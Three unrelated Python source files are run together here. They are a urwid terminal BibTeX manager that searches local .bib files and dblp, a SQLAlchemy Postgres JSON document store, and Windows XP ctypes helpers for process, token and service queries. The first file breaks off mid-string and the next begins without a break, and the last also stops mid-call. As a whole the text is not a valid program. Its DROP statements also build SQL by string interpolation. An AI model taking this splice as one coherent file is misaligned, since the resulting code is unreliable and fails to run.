self.searching_done.clear() def Redraw(self): with self.redraw_lock: try: os.write(self._redraw_fd, b"?") except: logging.error(traceback.format_exc()) def _FdWriteHandler(self, data): self.event_loop.draw_screen() class BibtexRepo(BibRepo): def __init__(self, glob_expr, event_loop, enabled): super().__init__(glob_expr, event_loop, enabled) self._bib_files = [] self._bib_entries = [] @property def bib_entries(self): self.loading_done.wait() return self._bib_entries @property def bib_files(self): self.loading_done.wait() return self._bib_files def LoadingThreadMain(self): glob_expr = self.source logging.debug(f"Collecting entries from glob expression '{glob_expr}'") self._bib_files = glob.glob(glob_expr, recursive=True) if not self._bib_files: logging.warning(f"Glob expr '{glob_expr}' matches no target") if self.message_bar is not None: self.message_bar.Post(f"Glob expr '{glob_expr}' matches no target.", 'warning') return 'no file' for path in self._bib_files: try: bib_data = pybtex.database.parse_file(path) except Exception as e: logging.error(f"Exception raised when parsing file {path}: {e}") continue for key, entry in iter(bib_data.entries.items()): self._bib_entries.append(BibtexEntry(key, entry, self, path)) logging.debug(f"Parsed {len(bib_data.entries)} entries from file {path}") return 'ready' def SearchingThreadMain(self, search_text): stripped = search_text.strip() if not stripped: return keywords = search_text.split() for entry in self.bib_entries: if entry.Match(keywords): yield entry class OutputBibtexRepo(BibtexRepo): def __init__(self, glob_expr, event_loop, enabled): super().__init__(glob_expr, event_loop, enabled) self.selected_keys_panel = None if len(self.bib_files) > 1: raise ValueError(f"Glob expr '{glob_expr}' matches more than one file") self.access_type = 'rw' self.output_file = self.bib_files[0] if self.bib_files else glob_expr def Write(self): if self.selected_keys_panel is None: return self.loading_done.wait() entries = {e.bibkey: e.pyb_entry for e in self.bib_entries} entries.update({e.bibkey: e.pyb_entry for e in self.selected_keys_panel.entries.values()}) for key, entry in entries.items(): if entry is None: logging.error(f"Key {key} has empty entry. Not writing to file.") return pybtex.database.BibliographyData(entries).to_file(self.output_file) logging.info(f"Wrote to file '{self.output_file}'") class DblpRepo(BibRepo): def __init__(self, event_loop, enabled): super().__init__("https://dblp.org", event_loop, enabled) def LoadingThreadMain(self): return 'ready' def SearchingThreadMain(self, search_text): stripped = search_text.strip() if not stripped: return url = f"https://dblp.org/search/publ/api?q={urllib.parse.quote(search_text)}&format=json" with urllib.request.urlopen(url) as response: bib_data = json.load(response) if 'hit' not in bib_data['result']['hits']: return [] for entry in bib_data['result']['hits']['hit']: yield DblpEntry(entry, self) class Banner(urwid.AttrMap): def __init__(self): super().__init__(urwid.SolidFill(), None) self.big_text = urwid.BigText([('banner_hi', "bib"), ('banner_lo', "rarian")], urwid.font.HalfBlock7x7Font()) self.big_text_clipped = urwid.Padding(self.big_text, 'center', width='clip') self.subtitle = urwid.Text(('banner_hi', "A BibTeX Management Tool Powered By D.B.L.P"), align='center') self.version = urwid.Text(('banner_lo', "version 1.0"), align='center') self.original_widget = urwid.Filler( urwid.Pile([self.big_text_clipped, self.subtitle, self.version]), 'middle') class SearchResultsPanel(urwid.AttrMap): def __init__(self): super().__init__(urwid.SolidFill(), None) self._serial = 0 self._serial_lock = threading.Lock() self.banner = Banner() self._Clear() @property def serial(self): return self._serial @serial.setter def serial(self, value): with self._serial_lock: self._serial = value self._Clear() def _Clear(self): self.items = [] self.SyncDisplay() def Add(self, entry, serial): with self._serial_lock: if self._serial == serial: self.items.append(entry.search_panel_widget) self.SyncDisplay() def SyncDisplay(self): enabled_items = [item for item in self.items if item.entry.repo.enabled] if enabled_items: self.list_walker = urwid.SimpleListWalker(enabled_items) self.original_widget = urwid.ListBox(self.list_walker) else: self.original_widget = self.banner def keypress(self, size, key): if key in ('ctrl n', 'j'): self.original_widget._keypress_down(size) elif key in ('ctrl p', 'k'): self.original_widget._keypress_up(size) else: self.original_widget.keypress(size, key) class SelectedKeysPanel(urwid.Pile): def __init__(self, keys_output): super().__init__([]) self.entries = {} self.keys_output = keys_output self.SyncDisplay() def Toggle(self, entry): key = entry.unique_key if key in self.entries: del self.entries[key] entry.mark = None else: self.entries[key] = entry entry.mark = 'selected' self.SyncDisplay() def Add(self, entry): self.entries[entry.unique_key] = entry self.SyncDisplay() def SyncDisplay(self): new_contents = [(ent.unique_key_item, ('pack', None)) for ent in self.entries.values()] if not new_contents: new_contents = [(urwid.Text(('selected_hint', "Hit <SPACE> on highlighted item to select.")), ('pack', None))] self.contents = new_contents def Write(self): if self.keys_output is None: return with open(self.keys_output, 'w') as f: print(','.join(map(lambda e: e.bibkey, self.entries.values())), file=f, end='') logging.info(f"Wrote selected keys to file '{self.keys_output}'") class SearchBar(urwid.AttrMap): def __init__(self): super().__init__(urwid.SolidFill(), 'search_content') self._search = urwid.Edit(('search_label', "Search: ")) self.original_widget = self._search self.search_results_panel = None self._search_serial = 0 self.bib_repos = [] urwid.connect_signal(self._search, 'change', self.TextChangeHandler) def TextChangeHandler(self, edit, text): if self.search_results_panel is None: return self.search_results_panel.serial = self._search_serial for repo in self.bib_repos: repo.Search(text, self._search_serial) self._search_serial += 1 class MessageBar(urwid.AttrMap): def __init__(self, loop): super().__init__(urwid.Text("Welcome to bibrarian."), 'msg_normal') self.event_loop = loop self._redraw_fd = loop.watch_pipe(self._FdWriteHandler) self.initial_delay = 1 self.post_delay = 3 self.tips_delay = 5 self.next_message_ready = threading.Event() self.next_message_scheduled = 0 self.messages = [ "Use ctrl+c to exit the program with all files untouched.", "Use ctrl+w to write the selected entries to the target file.", "Press @ (shift+2) open the entry using system browser.", "Use up (or ctrl+p or k) and down (or ctrl+n or j) to navigate the search results.", "Use alt+shift+n to toggle enabled/disabled the n-th bib repo.", "This software is powered by Python 3, dblp API, Pybtex, and urwid.", ] self.msg_lock = threading.Lock() self.periodic_trigger_thread = threading.Thread( name=f"msg-trigger", target=self._PeriodicTrigger, daemon=True) self.message_update_thread = threading.Thread( name=f"msg-update", target=self._UpdateMessage, daemon=True) self.periodic_trigger_thread.start() self.message_update_thread.start() def Post(self, message, severity='normal', delay=None): if severity == 'normal': label = "Message" style = 'msg_normal' elif severity == 'warning': label = "Warning" style = 'msg_warning' elif severity == 'error': label = "Error" style = 'msg_error' else: raise ValueError(f"Invalid severity: {severity}") with self.msg_lock: self.original_widget = urwid.Text((style, f"{label}: {message}")) self.next_message_ready.set() if delay is None: delay = self.post_delay self.next_message_scheduled = time.time() + delay def _FdWriteHandler(self, data): self.event_loop.draw_screen() def _PeriodicTrigger(self): time.sleep(self.initial_delay) while True: for message in self.messages: while True: if time.time() >= self.next_message_scheduled: with self.msg_lock: self.original_widget = urwid.Text(('msg_tips', f"Tip: {message}")) self.next_message_ready.set() self.next_message_scheduled = time.time() + self.tips_delay time.sleep(self.tips_delay) break else: time.sleep(1) continue def _UpdateMessage(self): while True: self.next_message_ready.wait() self.next_message_ready.clear() os.write(self._redraw_fd, b"?") def __del__(self): os.close(self._redraw_fd) class DetailsPanel(urwid.AttrMap): def __init__(self): super().__init__(urwid.Filler(urwid.Text( ('details_hint', 'Hit <i> on highlighted item to update info.')), 'top'), None) class InputFilter: def __init__(self): self.widget = None def __call__(self, keys, raw): if not keys: return keys if keys[0] == 'ctrl w': try: for repo in self.widget.output_repos: repo.Write() except: logging.error(traceback.format_exc()) try: self.widget.selected_keys_panel.Write() except: logging.error(traceback.format_exc()) raise urwid.ExitMainLoop() elif self.MaskDatabases(keys[0]): self.widget.search_results_panel.SyncDisplay() return return keys def MaskDatabases(self, key): symbol_number_map = {s: n for s, n in zip(")!@#$%^&*(", range(10))} if 'meta ' in key: symbol = key[5:] if symbol == '~': for repo in self.widget.bib_repos: repo.enabled = True else: number = symbol_number_map.get(symbol) if number == 0: for repo in self.widget.bib_repos: repo.enabled = False else: try: repo = self.widget.bib_repos[number - 1] repo.enabled = not repo.enabled except: pass return True elif key == 'enter': self.widget.focus_position = 1 - self.widget.focus_position else: return False class DatabaseStatusPanel(urwid.Pile): def __init__(self, databases, config_source): super().__init__([]) self.contents = [(db, ('pack', None)) for db in databases] \ + [(urwid.Text(('cfg_src', f"config: {config_source}")), ('pack', None))] class TopWidget(urwid.Pile): def __init__(self, args, config, event_loop): super().__init__([urwid.SolidFill()]) self.message_bar = MessageBar(event_loop) self.search_results_panel = SearchResultsPanel() self.details_panel = DetailsPanel() self.selected_keys_panel = SelectedKeysPanel(args.keys_output) self.output_repos = [BibRepo.Create(cfg, 'rw', event_loop) for cfg in config['rw_repos']] self.bib_repos = [BibRepo.Create(cfg, 'ro', event_loop) for cfg in config['ro_repos']] + self.output_repos for repo, i in zip(self.bib_repos, itertools.count(1)): repo.short_label = f"{i}" repo.message_bar = self.message_bar repo.search_results_panel = self.search_results_panel repo.selected_keys_panel = self.selected_keys_panel repo.details_panel = self.details_panel self.search_bar = SearchBar() self.search_bar.bib_repos = self.bib_repos self.search_bar.search_results_panel = self.search_results_panel self.db_status_panel = DatabaseStatusPanel( [repo.status_indicator_widget for repo in self.bib_repos], config.source) for repo in self.output_repos: repo.selected_keys_panel = self.selected_keys_panel self.right_panel = urwid.Pile([ ('pack', urwid.LineBox(self.db_status_panel, title="Database Info")), ('weight', 5, urwid.LineBox(self.details_panel, title="Detailed Info")), ('pack', urwid.LineBox(self.selected_keys_panel, title="Selected Entries"))]) self.main_widget = urwid.Columns([ ('weight', 2, urwid.LineBox(self.search_results_panel, title="Search Results")), ('weight', 1, self.right_panel)]) self.contents = [(self.search_bar, ('pack', None)), (self.main_widget, ('weight', 1)), (self.message_bar, ('pack', None))] class DefaultConfig(dict): def __init__(self): self['ro_repos'] = [ { 'remote': "dblp.org", 'enabled': True }, { 'glob': "/path/to/lots/of/**/*.bib", 'enabled': True }, { 'glob': "/path/to/sample.bib", 'enabled': False }, { 'glob': "/path/to/another/sample.bib" } ] self['rw_repos'] = [ { 'glob': "reference.bib", 'enabled': True } ] def Write(self, file): with open(file, 'w') as f: json.dump(self, f, indent=4) class Config(dict): def __init__(self, file_name): prefix = os.getcwd() self.source = None while True: path = os.path.join(prefix, file_name) if os.path.isfile(path) and os.access(path, os.R_OK): with open(path) as f: self.update(json.load(f)) self.source = path break if prefix == '/': break prefix = os.path.dirname(prefix) if self.source is None: print("Did not find any config file.") print("You can generate an example config file using option -g.") print("For more information, please use option -h for help.") sys.exit(1) self._NormalizePaths() def _NormalizePaths(self): config_dir = os.path.dirname(os.path.realpath(self.source)) for repo_group in (self[k] for k in ('ro_repos', 'rw_repos')): for repo_config in repo_group: if 'glob' in repo_config: repo_config['glob'] = os.path.expandvars(os.path.expanduser(repo_config['glob'])) if not os.path.isabs(repo_config['glob']): repo_config['glob'] = os.path.join(config_dir, repo_config['glob']) class ArgParser(argparse.ArgumentParser): def __init__(self): super().__init__(prog="bibrarian") self.add_argument("-f", "--config", help="force configuration file path", default=".bibrarian_config.json", action='store' ) self.add_argument("-g", "--gen-config", help="generate a configuration file", default=False, action='store_true') self.add_argument("-l", "--log", help="force log file path", default=f"/tmp/{getpass.getuser()}_babrarian.log", action='store') self.add_argument("-k", "--keys-output", help="output bib keys file (truncate mode)", action='store') self.add_argument("-v", "--version", action='version', version="%(prog)s 1.0") class Palette(list): def __init__(self): self.append(('search_label', 'yellow', 'dark magenta')) self.append(('search_content', 'white', 'dark magenta')) self.append(('search_hint', 'light cyan', 'dark magenta')) self.append(('msg_tips', 'white', 'dark gray')) self.append(('msg_normal', 'light green', 'dark gray')) self.append(('msg_warning', 'yellow', 'dark gray')) self.append(('msg_error', 'light red', 'dark gray')) self.append(('details_hint', 'dark green', 'default')) self.append(('db_label', 'default', 'default')) self.append(('db_enabled', 'light cyan', 'default')) self.append(('db_status_ready', 'light
import datetime import json from typing import Dict, List, Optional import json_merge_patch from loguru import logger from sqlalchemy import Column, DateTime, MetaData, Table, func, text from sqlalchemy.dialects import postgresql from sqlalchemy.engine import Row from sqlalchemy.exc import ( IntegrityError, NoResultFound, OperationalError, ProgrammingError, ) from sqlalchemy.future import Engine, create_engine from contaxy.operations import JsonDocumentOperations from contaxy.schema.exceptions import ( ClientValueError, ResourceAlreadyExistsError, ResourceNotFoundError, ServerBaseError, ) from contaxy.schema.json_db import JsonDocument from contaxy.utils.postgres_utils import create_schema from contaxy.utils.state_utils import GlobalState, RequestState class PostgresJsonDocumentManager(JsonDocumentOperations): def __init__( self, global_state: GlobalState, request_state: RequestState, ): """Initializes the Postgres Json Document Manager. Args: global_state: The global state of the app instance. request_state: The state for the current request. """ self.global_state = global_state self.request_state = request_state self._engine = self._create_db_engine() self._metadata = MetaData() def create_json_document( self, project_id: str, collection_id: str, key: str, json_document: str, upsert: bool = True, ) -> JsonDocument: """Creates a json document for a given key. An upsert strategy is used, i.e. if a document already exists for the given key it will be overwritten. The project is equivalent to the DB schema and the collection to a DB table inside the respective DB schema. Schema as well as table will be lazily created. Args: project_id (str): Project Id, i.e. DB schema. collection_id (str): Json document collection Id, i.e. DB table. key (str): Json Document Id, i.e. DB row key. json_document (Dict): The actual Json document. upsert (bool): Indicates, wheter upsert strategy is used. Raises: ClientValueError: If the given json_document does not contain valid json. ResourceAlreadyExistsError: If a document already exists for the given key and `upsert` is False. Returns: JsonDocument: The created Json document. """ try: json_dict = json.loads(json_document) except json.decoder.JSONDecodeError: raise ClientValueError("Invalid Json provided") table = self._get_collection_table(project_id, collection_id) insert_data = {"key": key, "json_value": json_dict} insert_data = self._add_metadata_for_insert(insert_data) upsert_data = self._add_metadata_for_update(insert_data) stmt = postgresql.insert(table).values(**insert_data) if upsert: stmt = stmt.on_conflict_do_update(index_elements=["key"], set_=upsert_data) with self._engine.begin() as conn: try: result = conn.execute(stmt) if result.rowcount == 0: raise ServerBaseError( f"Json Document creation for key {key} for an unknown reason" ) conn.commit() except IntegrityError: raise ResourceAlreadyExistsError( f"A Json document for key {key} already exists." ) return self.get_json_document(project_id, collection_id, key) def get_json_document( self, project_id: str, collection_id: str, key: str ) -> JsonDocument: """Get a Json document by key. The project is equivalent to the DB schema and the collection to a DB table inside the respective DB schema. Schema as well as table will be lazily created. Args: project_id (str): Project Id, i.e. DB schema. collection_id (str): Json document collection Id, i.e. DB table. key (str): Json Document Id, i.e. DB row key. json_document (Dict): The actual Json document. Raises: ResourceNotFoundError: If no JSON document is found with the given `key`. Returns: JsonDocument: The requested Json document. """ table = self._get_collection_table(project_id, collection_id) select_statement = table.select().where(table.c.key == key) with self._engine.begin() as conn: result = conn.execute(select_statement) try: row = result.one() except NoResultFound: raise ResourceNotFoundError(f"No document with key {key} found") return self._map_db_row_to_document_model(row) def update_json_document( self, project_id: str, collection_id: str, key: str, json_document: str, ) -> JsonDocument: """Updates a Json document via Json Merge Patch strategy. The project is equivalent to the DB schema and the collection to a DB table inside the respective DB schema. Schema as well as table will be lazily created. Args: project_id (str): Project Id, i.e. DB schema. collection_id (str): Json document collection Id, i.e. DB table. key (str): Json Document Id, i.e. DB row key. json_document (Dict): The actual Json document. Raises: ResourceNotFoundError: If no JSON document is found with the given `key`. ServerBaseError: Document not updatded for an unknown reason. Returns: JsonDocument: The updated document. """ table = self._get_collection_table(project_id, collection_id) update_data = self._add_metadata_for_update({}) select_statement = table.select().with_for_update().where(table.c.key == key) with self._engine.begin() as conn: result = conn.execute(select_statement) if result.rowcount == 0: raise ResourceNotFoundError( f"Update failed - No document with key {key} found" ) row = result.one() update_data["json_value"] = json_merge_patch.merge( row["json_value"], json.loads(json_document) ) # The json_value needs to be a dict otherwise the string gets escaped update_statement = ( table.update().where(table.c.key == key).values(**update_data) ) result = conn.execute(update_statement) conn.commit() return self.get_json_document(project_id, collection_id, key) def delete_json_document( self, project_id: str, collection_id: str, key: str ) -> None: """Delete a Json document by key. The project is equivalent to the DB schema and the collection to a DB table inside the respective DB schema. Schema as well as table will be lazily created. Args: project_id (str): Project Id, i.e. DB schema. collection_id (str): Json document collection Id, i.e. DB table. key (str): Json Document Id, i.e. DB row key. json_document (Dict): The actual Json document. Raises: ResourceNotFoundError: If no JSON document is found with the given `key`. ServerBaseError: Document not deleted for an unknown reason. """ table = self._get_collection_table(project_id, collection_id) delete_statement = table.delete().where(table.c.key == key) with self._engine.begin() as conn: result = conn.execute(delete_statement) if result.rowcount == 0: # This will raise a ResourceNotFoundError if doc not exists self.get_json_document(project_id, collection_id, key) raise ServerBaseError( f"Document {key} could not be deleted (project_id: {project_id}, collection_id {collection_id})" ) conn.commit() def delete_documents( self, project_id: str, collection_id: str, keys: List[str] ) -> int: """Delete Json documents by key. The project is equivalent to the DB schema and the collection to a DB table inside the respective DB schema. Schema as well as table will be lazily created. Args: project_id (str): Project Id, i.e. DB schema. collection_id (str): Json document collection Id, i.e. DB table. keys (List[str]): Json Document Ids, i.e. DB row keys. json_document (Dict): The actual Json document. """ table = self._get_collection_table(project_id, collection_id) delete_statement = table.delete().where(table.c.key.in_(keys)) with self._engine.begin() as conn: result = conn.execute(delete_statement) conn.commit() return result.rowcount def list_json_documents( self, project_id: str, collection_id: str, filter: Optional[str] = None, keys: Optional[List[str]] = None, ) -> List[JsonDocument]: """List all existing Json documents and optionally filter via Json Path syntax. The project is equivalent to the DB schema and the collection to a DB table inside the respective DB schema. Schema as well as table will be lazily created. Args: project_id (str): Project Id, i.e. DB schema. collection_id (str): Json document collection Id, i.e. DB table. filter (Optional[str], optional): Json Path filter. Defaults to None. keys (Optional[List[str]], optional): Json Document Ids, i.e. DB row keys. Defaults to None. Raises: ClientValueError: If filter is provided and does not contain a valid Json Path filter. Returns: List[JsonDocument]: List of Json documents. """ table = self._get_collection_table(project_id, collection_id) sql_statement = table.select() if filter: sql_statement = sql_statement.where( func.jsonb_path_exists(table.c.json_value, filter), ) if keys: sql_statement = sql_statement.where(table.c.key.in_(keys)) with self._engine.begin() as conn: try: result = conn.execute(sql_statement) except ProgrammingError: raise ClientValueError("Please provide a valid Json Path filter.") rows = result.fetchall() return self._map_db_rows_to_document_models(rows) def delete_json_collections( self, project_id: str, ) -> None: """Deletes all JSON collections for a project. Args: project_id: Project ID associated with the collections. """ # TODO: Check if further error handling is needed with self._engine.begin() as conn: stmt = text( f'DROP SCHEMA IF EXISTS "{self._get_schema_name(project_id)}" cascade' ) conn.execute(stmt) conn.commit() def delete_json_collection( self, project_id: str, collection_id: str, ) -> None: """Delete a JSON collection. Args: project_id (str): Project ID associated with the collection. collection_id (str): The collection to be deleted. """ stmt = text( f'DROP TABLE IF EXISTS "{self._get_schema_name(project_id)}"."{collection_id}" cascade' ) with self._engine.begin() as conn: conn.execute(stmt) conn.commit() def _add_metadata_for_insert(self, data: dict) -> dict: # TODO: Copy required? insert_data = data.copy() # TODO: Finalize insert_data["created_at"] = datetime.datetime.utcnow() # data["created_by"] = return insert_data def _add_metadata_for_update(self, data: dict) -> dict: update_data = data.copy() # TODO: Finalize update_data["updated_at"] = datetime.datetime.utcnow() # data["updated_by"] = return update_data def _map_db_rows_to_document_models(self, rows: List[Row]) -> List[JsonDocument]: docs = [] for row in rows: docs.append(self._map_db_row_to_document_model(row)) return docs def _map_db_row_to_document_model(self, row: Row) -> JsonDocument: data: Dict = {} for column_name, value in row._mapping.items(): if column_name == "json_value": value = json.dumps(value) data.update({column_name: value}) return JsonDocument(**data) def _get_collection_table(self, project_id: str, collection_id: str) -> Table: # TODO: Decide on actual column datatypes collection = Table( collection_id, self._metadata, Column("key", postgresql.VARCHAR, primary_key=True), Column("json_value", postgresql.JSONB), Column("created_at", DateTime), Column("created_by", postgresql.VARCHAR), Column("updated_at", DateTime), Column("updated_by", postgresql.VARCHAR), schema=self._get_schema_name(project_id), keep_existing=True, # TODO: Depends on how we handle schema modifications ) try: collection.create(self._engine, checkfirst=True) except ProgrammingError: create_schema(self._engine, self._get_schema_name(project_id)) collection.create(self._engine, checkfirst=True) return collection
""" Windows XP functions """ from typing import Sequence, List, Tuple, Dict, Callable, Union, Optional from ctypes import c_wchar_p, c_int from ctypes import sizeof as c_sizeof from ctypes import cast as c_cast import atexit from .windows_common import ( byref, create_unicode_buffer, DWORD, UINT, LONG, CHAR, BOOL, BYTE, LPCWSTR, LPVOID, HMODULE, HANDLE, HWND, WPARAM, LPARAM, POINTER, Structure, WindowsErrorMessage, WinDLL, windll, MessageCallback, ) from .. import windows_constants from .supported_functions import ( Functions, ) from .process_metrics import ProcessMetrics from .window_metrics import WindowMetrics, FontMetrics def load_functions(environ: Dict[str, str], func_map: Functions) -> None: # TODO include Windows Server 2003 detection if environ['system'].lower() == 'windows' and environ['release'].lower() == 'xp': func_map.shell.find_notification_icons = create_shell__find_notification_icons(func_map) func_map.process.load_all_process_details = process__load_all_process_details load_psapi_functions(func_map) load_info_functions(func_map) load_taskbar_functions(func_map) load_window_functions(func_map) def load_psapi_functions(func_map: Functions) -> None: func_map.process.get_executable_filename = process__get_executable_filename func_map.process.get_all_service_information = process__get_all_service_information func_map.process.get_username_domain_for_pid = process__get_username_domain_for_pid func_map.process.get_current_username_domain = process__get_current_username_domain func_map.process.get_all_pids = process__get_all_pids def load_info_functions(func_map: Functions) -> None: func_map.shell.get_window_metrics = shell__get_window_metrics func_map.shell.set_window_metrics = shell__set_window_metrics func_map.shell.set_border_size = shell__set_border_size def load_taskbar_functions(func_map: Functions) -> None: func_map.shell.open_start_menu = shell__open_start_menu def load_window_functions(func_map: Functions) -> None: func_map.window.create_borderless_window = create_window__create_borderless_window(func_map) def create_shell__find_notification_icons(func_map: Functions) -> Optional[Callable[[], Sequence[HWND]]]: if not func_map.window.find_handle_for_child_class_title: return None find_window_ex = func_map.window.find_handle_for_child_class_title if not func_map.shell.get_task_bar_window_handles: return None shell__get_task_bar_window_handles = func_map.shell.get_task_bar_window_handles def fw(parent: Optional[HWND], class_name: str) -> Optional[HWND]: if not parent: return None return find_window_ex(parent, None, class_name, "") def f() -> Sequence[HWND]: ret: List[HWND] = [] for tbw_handle in shell__get_task_bar_window_handles(): parent_area = fw(fw(tbw_handle, "TrayNotifyWnd"), "SysPager") if not parent_area: continue for title in ['Notification Area', 'Overflow Notification Area']: handle = find_window_ex( parent_area, None, "ToolbarWindow32", title ) if handle is not None and handle.value is not None and handle not in ret: # TODO get icons ret.append(handle) return ret return f def process__get_executable_filename(thread_pid: DWORD) -> Union[str, WindowsErrorMessage, None]: psapi = WinDLL('psapi.dll') EnumProcesses = psapi.EnumProcesses EnumProcessModules = psapi.EnumProcessModules GetModuleBaseName = psapi.GetModuleBaseNameW # Alternate: GetModuleFileNameEx GetProcessImageFileName = psapi.GetProcessImageFileNameW hproc = windll.kernel32.OpenProcess( windows_constants.PROCESS_QUERY_INFORMATION | windows_constants.PROCESS_VM_READ, False, thread_pid ) if hproc != 0 and hproc is not None: try: filename = create_unicode_buffer(windows_constants.MAX_FILENAME_LENGTH + 1) res = GetProcessImageFileName(hproc, None, byref(filename), windows_constants.MAX_FILENAME_LENGTH + 1) if res > 0: print("DEBUG found filename ({1}) for pid {0}".format(thread_pid, filename)) return filename.value[:res] print("DEBUG failed to get filename for pid {0}: {1}".format(thread_pid, WindowsErrorMessage('GetProcessImageFileName'))) finally: windll.kernel32.CloseHandle(hproc) else: print("DEBUG failed to open the process handle for pid {0}".format(thread_pid)) # So, GetProcessImageFileName failed, as it's apt to do. # So, do this the hard way. process_list = (DWORD * windows_constants.MAX_PROCESS_COUNT)() bytes_returned = DWORD() res = EnumProcesses(process_list, c_sizeof(process_list), byref(bytes_returned)) if res != 0: return WindowsErrorMessage('psapi.EnumProcesses') # raise ctypes.WinError() for i in range(bytes_returned.value // c_sizeof(DWORD)): pid = process_list[i] if pid == thread_pid: hproc = windll.kernel32.OpenProcess( windows_constants.PROCESS_QUERY_INFORMATION | windows_constants.PROCESS_VM_READ, None, pid ) if hproc is None or 0 == hproc: continue try: buffer_index_count = 1024 count_allocated_space = DWORD() hmod_list = (HMODULE * buffer_index_count)() res = EnumProcessModules( hproc.value, hmod_list, DWORD(c_sizeof(hmod_list)), byref(count_allocated_space) ) if res == 0: # Error; ignore continue for j in range(count_allocated_space.value // c_sizeof(HMODULE)): mod_name = create_unicode_buffer(windows_constants.MAX_FILENAME_LENGTH + 1) res = GetModuleBaseName(hproc, hmod_list[j], mod_name, windows_constants.MAX_FILENAME_LENGTH + 1) if res != 0: return str(mod_name.value[:res]) finally: windll.kernel32.CloseHandle(hproc) return None def process__get_username_domain_for_pid(thread_pid: DWORD) -> Union[Tuple[str, str], WindowsErrorMessage]: """ :param thread_pid: :return: the tuple (username, domain) for the user that owns the pid. """ OpenProcessToken = windll.advapi32.OpenProcessToken OpenProcessToken.argtypes = [HANDLE, DWORD, POINTER(HANDLE)] OpenProcessToken.restype = BOOL GetTokenInformation = windll.advapi32.GetTokenInformation LookupAccountSidW = windll.advapi32.LookupAccountSidW LookupAccountSidW.argtypes = [ LPCWSTR, LPVOID, LPCWSTR, POINTER(DWORD), LPCWSTR, POINTER(DWORD), POINTER(DWORD) ] LookupAccountSidW.restype = BOOL # WinXP does not support PROCESS_QUERY_LIMITED_INFORMATION # This needs to have a special Windows 8 vs. other implementation. # Win 8 uses the more limited query. hproc = windll.kernel32.OpenProcess(windows_constants.PROCESS_QUERY_INFORMATION, False, thread_pid) if hproc == 0: err = WindowsErrorMessage('kernel32.OpenProcess') if err.errno == windows_constants.ERROR_ACCESS_DENIED: # Don't raise a problem in this situation. Instead, return unique information. return "[denied]", "[denied]" return err try: access_token = HANDLE() res = OpenProcessToken(hproc, DWORD(windows_constants.TOKEN_QUERY), byref(access_token)) if res == 0 or access_token is None: return WindowsErrorMessage('advapi32.OpenProcessToken') try: length = DWORD(0) res = GetTokenInformation( access_token, windows_constants.TOKEN_INFORMATION__TOKEN_USER, None, 0, byref(length) ) if res == 0: err = WindowsErrorMessage('advapi32.GetTokenInformation') if err.errno != windows_constants.ERROR_INSUFFICIENT_BUFFER: return err raw_sid_info = (BYTE * length.value)() if raw_sid_info is None: return WindowsErrorMessage('memory allocation failed') sid_info = c_cast(raw_sid_info, POINTER(LPVOID)) else: sid_info = POINTER(LPVOID)() res = GetTokenInformation( access_token, windows_constants.TOKEN_INFORMATION__TOKEN_USER, sid_info, length, byref(length) ) if res == 0: return WindowsErrorMessage('advapi32.GetTokenInformation') # The "sid_info" is a pointer to a structure, but the only thing we care about # is the first value in the structure (index 0), which is itself a pointer to a SID structure. sid_ptr = sid_info[0] username = create_unicode_buffer(windows_constants.MAX_USERNAME_LENGTH + 1) username_size = DWORD(windows_constants.MAX_USERNAME_LENGTH) domain = create_unicode_buffer(windows_constants.MAX_USERNAME_LENGTH + 1) domain_size = DWORD(windows_constants.MAX_USERNAME_LENGTH) sid_name_type = DWORD() res = LookupAccountSidW( None, sid_ptr, username, byref(username_size), domain, byref(domain_size), byref(sid_name_type)) if res == 0: return WindowsErrorMessage('advapi32.LookupAccountSidW') # return username.value[0:username_size], domain.value[0:domain_size] return username.value, domain.value finally: windll.kernel32.CloseHandle(access_token) finally: windll.kernel32.CloseHandle(hproc) def process__get_current_username_domain() -> Union[Tuple[str, str], WindowsErrorMessage]: # Just the username is easy (GetUserName), but the domain takes more work. return process__get_username_domain_for_pid(windll.kernel32.GetCurrentProcessId()) def process__load_all_process_details() -> Sequence[Dict[str, str]]: raise OSError("Undefined") # https://msdn.microsoft.com/en-us/library/windows/desktop/ms682648(v=vs.85).aspx # https://msdn.microsoft.com/en-us/library/windows/desktop/ms685992(v=vs.85).aspx class ENUM_SERVICE_STATUS_PROCESS(Structure): _fields_ = ( ("lpServiceName", c_wchar_p), # string pointer ("lpDisplayName", c_wchar_p), # string pointer # ServiceStatusProcess ("dwServiceType", DWORD), ("dwCurrentState", DWORD), ("dwControlsAccepted", DWORD), ("dwWin32ExitCode", DWORD), ("dwServiceSpecificExitCode", DWORD), ("dwCheckPoint", DWORD), ("dwWaitHint", DWORD), ("dwProcessId", DWORD), ("dwServiceFlags", DWORD), ) _SERVICE_TYPES: Dict[int, str] = { 1: 'SERVICE_KERNEL_DRIVER', 2: 'SERVICE_FILE_SYSTEM_DRIVER', 0x10: 'SERVICE_WIN32_OWN_PROCESS', 0x20: 'SERVICE_WIN32_SHARE_PROCESS', } _SERVICE_CURRENT_STATES: Dict[int, str] = { 0x5: 'SERVICE_CONTINUE_PENDING', 0x6: 'SERVICE_PAUSE_PENDING', 0x7: 'SERVICE_PAUSED', 0x4: 'SERVICE_RUNNING', 0x2: 'SERVICE_START_PENDING', 0x3: 'SERVICE_STOP_PENDING', 0x1: 'SERVICE_STOPPED', } def process__get_all_service_information() -> Union[WindowsErrorMessage, Sequence[ProcessMetrics]]: advapi32 = WinDLL('advapi32.dll') OpenSCManager = advapi32.OpenSCManagerW OpenSCManager.restype = DWORD EnumServicesStatusEx = advapi32.EnumServicesStatusExW # EnumServicesStatusExW(SC_HANDLE,SC_ENUM_TYPE,DWORD,DWORD,LPBYTE,DWORD,LPDWORD,LPDWORD,LPDWORD,LPCWSTR); # EnumServicesStatusEx.argtypes = [ # c_int, # hSCManager (SC_HANDLE) # c_int, # InfoLevel (SC_ENUM_TYPE) # wintypes.DWORD, # dwServiceType # wintypes.DWORD, # dwServiceState # wintypes.LPBYTE, # lpServices # wintypes.DWORD, # cbBufSize # wintypes.LPDWORD, # pcbBytesNeeded # wintypes.LPDWORD, # lpServicesReturned # wintypes.LPDWORD, # lpResumeHandle # wintypes.LPCWSTR # pszGroupname # ] CloseServiceHandle = advapi32.CloseServiceHandle CloseServiceHandle.argtypes = [HANDLE] sc = OpenSCManager(None, None, windows_constants.SC_MANAGER_ENUMERATE_SERVICE) if sc == 0: return WindowsErrorMessage('advapi32.OpenSCManagerW') try: bytes_needed = DWORD(0) service_byte_count = DWORD(0) service_count = DWORD(0) resume_handle = DWORD(0) status_array = None # Start off with 0 bytes allocated, and increase from there. while True: res = EnumServicesStatusEx( sc, windows_constants.SC_ENUM_PROCESS_INFO, # SERVICE_DRIVER | SERVICE_FILE_SYSTEM_DRIVER | 